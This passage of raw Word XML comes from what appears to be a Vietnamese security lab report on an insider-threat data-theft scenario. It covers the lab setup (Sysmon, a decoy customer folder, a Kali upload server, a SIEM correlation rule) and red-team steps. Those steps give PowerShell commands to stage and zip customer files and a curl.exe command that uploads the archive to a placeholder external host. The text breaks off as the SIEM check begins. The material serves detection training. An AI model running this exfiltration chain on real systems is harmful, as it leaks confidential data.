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938A7" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc234664913"/>
      <w:r w:rsidRPr="00654AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Kịch bản 3:  INSIDER THREAT ĐÁNH CẮP DỮ LIỆU NỘI BỘ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="4B1B9EB9" w14:textId="77777777" w:rsidR="009D6A35" w:rsidRDefault="009D6A35" w:rsidP="009D6A35">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F07565A" w14:textId="12FB3B38" w:rsidR="009D6A35" w:rsidRPr="009D6A35" w:rsidRDefault="009D6A35" w:rsidP="009D6A35">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1886E1D0" wp14:editId="10B1E06C">
            <wp:extent cx="5733415" cy="1644650"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="1215926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a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="14503" b="42324"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="1644650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AF4D91" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc234664914"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>1. Mô tả tình huống</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="303F608F" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2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Phát hiện hành vi người dùng nội bộ lạm dụng đặc quyền để thu thập dữ liệu nhạy cảm diện rộng, sử dụng công cụ hệ thống đóng gói và tải lên các dịch vụ lưu trữ đám mây cá nhân ngoài giờ làm việc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A682039" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc234664915"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2. Chuẩn bị môi trường</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="57A8EF1E" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="000D3737">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_heading=h.i3zd2b6gkfr4" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Style100"/>
        <w:tblW w:w="9568" w:type="dxa"/>
        <w:jc w:val="center"/>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993"/>
        <w:gridCol w:w="1665"/>
        <w:gridCol w:w="1950"/>
        <w:gridCol w:w="3960"/>
      </w:tblGrid>
      <w:tr w:rsidR="000D3737" w14:paraId="65153B5F" w14:textId="77777777" w:rsidTr="00654AC6">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1993" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F5F8"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="06EA2586" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="20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Thành phần</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F5F8"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5FAE2E10" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="20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Hệ điều hành</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1950" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F5F8"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="382A1858" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="20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Vai trò</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F5F8"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="41F4BD76" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="20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Cấu hình triển khai</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D3737" w14:paraId="18967070" w14:textId="77777777" w:rsidTr="00654AC6">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1993" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7A938DBD"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Sales_Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="09B190E3"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Windows 10/11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1950" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7C100670"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Máy trạm nhân viên</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0DD3FCD0"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Cài đặt Sysmon ghi nhận log tạo tiến trình (Event ID 1) và mạng (Event ID 3). Tạo thư mục mồi nhử dữ liệu tại C:\Company_Data\VIP_Customers\.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D3737" w14:paraId="3EC7369A" w14:textId="77777777" w:rsidTr="00654AC6">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1993" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5E6426FE"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External Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4338C1DA"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Kali Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1950" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7371B164"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Cloud cá nhân ảo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6BAF4A6D"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Cài đặt công cụ nhận tải file bằng Python qua port 8000: python3 -m uploadserver 8000.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D3737" w14:paraId="1FE7864F" w14:textId="77777777" w:rsidTr="00654AC6">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1993" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7B868749"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SIEM Setup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7300F773"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Ubuntu Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1950" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0721E167"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phân tích</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="39D0F22D"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Thiết lập luật tương quan (Correlation Rule) giữa hành vi nén file và hành vi upload mạng ngoài giờ hành chính.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="10185600" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc234664916"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3. Các bước thực hiện tấn công (Red Team)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="10A7F48D" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="000D3737">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_heading=h.b6pdwrbrixc6" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Style101"/>
        <w:tblW w:w="11880" w:type="dxa"/>
        <w:jc w:val="center"/>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455"/>
        <w:gridCol w:w="4500"/>
        <w:gridCol w:w="5925"/>
      </w:tblGrid>
      <w:tr w:rsidR="000D3737" w14:paraId="379B076E" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1455" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F5F8"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="165D81B1" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="20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Các bước</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F5F8"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1C452D2F" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="20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Chi tiết hành động &amp; Lệnh thực thi (Command / Payload)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5925" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F5F8"/>
          </w:tcPr>
          <w:p w14:paraId="24E31B4C" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="20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Minh chứng</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D3737" w14:paraId="3BB35FDD" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1455" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5178D21D"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Bước 1: Thu thập gom dữ liệu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2321837F"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mở cửa sổ PowerShell quyền thường, tạo thư mục tạm ẩn và copy toàn bộ tài liệu khách hàng mật:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:br/>
              <w:t>New-Item -ItemType Directory -Path 'C:\Users\Public\Music\Staging'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:br/>
              <w:t>Copy-Item -Path 'C:\Company_Data\VIP_Customers\*' -Destination 'C:\Users\Public\Music\Staging' -Recurse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5925" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="57BE5442"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0582AF3F" wp14:editId="0189A6BC">
                  <wp:extent cx="3002280" cy="268605"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="44" name="image33.png"/>
                  <wp:cNvGraphicFramePr/>
                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="44" name="image33.png"/>
                          <pic:cNvPicPr preferRelativeResize="0"/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId39"/>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3002350" cy="269144"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D3737" w14:paraId="19BF3C1D" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1455" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6B716CBC"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Bước 2: Đóng gói nén tệp tin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="79656520"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lệnh nén tích hợp mặc định của Windows để gom tệp:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">Compress-Archive -Path 'C:\Users\Public\Music\Staging\*' -DestinationPath </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>'C:\Users\Public\Music\Personal_Backup.zip'</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5925" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p w14:paraId="41E56E24"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0" distB="0" distL="0" distR="0" wp14:anchorId="18CE192C" wp14:editId="35A85A2B">
                  <wp:extent cx="3634740" cy="307975"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="45" name="image31.png"/>
                  <wp:cNvGraphicFramePr/>
                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="45" name="image31.png"/>
                          <pic:cNvPicPr preferRelativeResize="0"/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId40"/>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3635004" cy="308583"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D3737" w14:paraId="2AE9D2FA" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1455" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5871E0A0"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Bước 3: Tuồn dữ liệu đi (Exfil)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="23C34DE4"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Dùng công cụ dòng lệnh curl.exe có sẵn để đẩy file zip lên máy chủ bên ngoài ngoài giờ làm việc:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:br/>
              <w:t>curl.exe -X POST -F 'files=@C:\Users\Public\Music\Personal_Backup.zip' http://&lt;IP_Cloud_Ngoai&gt;:8000/upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5925" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="168FEFA9"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1697F6E8" wp14:editId="5EE7E4D1">
                  <wp:extent cx="3108325" cy="316230"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="46" name="image67.png"/>
                  <wp:cNvGraphicFramePr/>
                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="46" name="image67.png"/>
                          <pic:cNvPicPr preferRelativeResize="0"/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId41"/>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3108806" cy="316859"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="674F9D94" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc234664917"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>4. Kiểm tra trên SIEM</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="745D3205" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="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hoàn thành các bước tấn công, truy xuất log thông qua </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>/var/ossec/logs/archives/archives.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
